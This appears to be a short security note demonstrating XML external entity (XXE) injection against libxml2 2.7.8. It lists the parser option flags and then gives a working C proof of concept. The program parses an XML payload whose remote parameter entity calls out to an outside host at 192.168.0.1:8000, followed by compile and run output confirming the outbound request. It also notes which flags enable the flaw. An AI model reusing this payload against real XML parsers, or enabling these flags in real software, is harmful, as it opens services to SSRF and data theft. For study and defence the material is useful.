dpkg -s libxml2-dev
#output
Package: libxml2-dev
Status: install ok installed
Multi-Arch: same
Priority: optional
Section: libdevel
Installed-Size: 2697
Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com>
Architecture: amd64
Source: libxml2
Version: 2.7.8.dfsg-5.1ubuntu4.17
Depends: libxml2 (= 2.7.8.dfsg-5.1ubuntu4.17)
Description: Development files for the GNOME XML library
XML is a metalanguage to let you design your own markup language.
A regular markup language defines a way to describe information in
a certain class of documents (eg HTML). XML lets you define your
own customized markup languages for many classes of document. It
can do this because it's written in SGML, the international standard
metalanguage for markup languages.
.
Install this package if you wish to develop your own programs using
the GNOME XML library.
Homepage: http://xmlsoft.org/
Original-Maintainer: Debian XML/SGML Group <debian-xml-sgml-pkgs@lists.alioth.debian.org>
xmlDocPtr xmlReadMemory (const char * buffer,
int size,
const char * URL,
const char * encoding,
int options)para option define
Enum xmlParserOption {
XML_PARSE_RECOVER = 1 : recover on errors
XML_PARSE_NOENT = 2 : substitute entities
XML_PARSE_DTDLOAD = 4 : load the external subset
XML_PARSE_DTDATTR = 8 : default DTD attributes
XML_PARSE_DTDVALID = 16 : validate with the DTD
XML_PARSE_NOERROR = 32 : suppress error reports
XML_PARSE_NOWARNING = 64 : suppress warning reports
XML_PARSE_PEDANTIC = 128 : pedantic error reporting
XML_PARSE_NOBLANKS = 256 : remove blank nodes
XML_PARSE_SAX1 = 512 : use the SAX1 interface internally
XML_PARSE_XINCLUDE = 1024 : Implement XInclude substitition
XML_PARSE_NONET = 2048 : Forbid network access
XML_PARSE_NODICT = 4096 : Do not reuse the context dictionary
XML_PARSE_NSCLEAN = 8192 : remove redundant namespaces declarations
XML_PARSE_NOCDATA = 16384 : merge CDATA as text nodes
XML_PARSE_NOXINCNODE = 32768 : do not generate XINCLUDE START/END nodes
XML_PARSE_COMPACT = 65536 : compact small text nodes; no modification of the tree allowed afterwards (will possibly crash if you try to modify the tree)
XML_PARSE_OLD10 = 131072 : parse using XML-1.0 before update 5
XML_PARSE_NOBASEFIX = 262144 : do not fixup XINCLUDE xml:base uris
XML_PARSE_HUGE = 524288 : relax any hardcoded limit from the parser
XML_PARSE_OLDSAX = 1048576 : parse using SAX2 interface before 2.7.0
XML_PARSE_IGNORE_ENC = 2097152 : ignore internal document encoding hint
XML_PARSE_BIG_LINES = 4194304 : Store big lines numbers in text PSVI field
}the option is 0
doc = xmlReadMemory(data, size, NULL, NULL, 0)if option == 0 XXE no effect if option > 0 XXE work
XML_PARSE_NOENT-> success XML_PARSE_DTDLOAD -> sucess XML_PARSE_RECOVER -> failed
#include <stdio.h>
#include <stdlib.h>
#include <libxml/parser.h>
#include <libxml/tree.h>
int main(int argc, char **argv) {
static const char buf[] =
"<?xml version=\"1.0\"?>\n"
"<!DOCTYPE root [\n"
"<!ENTITY % remote SYSTEM \"http:\/\/192.168.0.1:8000/1111\">\n"
"%remote;]>"
"<root/>";
xmlDocPtr doc = xmlReadMemory(buf, sizeof(buf), "noname.xml", NULL,XML_PARSE_NOENT);
xmlFreeDoc(doc);
return 0;
}
ubuntu@ubuntu:~$ gcc -std=c99 -O2 -I/usr/include/libxml2 test.c -lxml2 -o so
test.c: 在函数‘main’中:
test.c:29:2: 警告: 未知的转义序列:‘\/’ [默认启用]
test.c:29:2: 警告: 未知的转义序列:‘\/’ [默认启用]
ubuntu@ubuntu:~$ ./so
noname.xml:4: I/O warning : failed to load HTTP resource
%remote;]><root/>
^
%remote;
^
your dnslog will see the request
Note: starting with libxml2 version 2.9, XXE has been disabled by default as committed by the following patch:
http://git.gnome.org/browse/libxml2/commit/?id=4629ee02ac649c27f9c0cf98ba017c6b5526070f.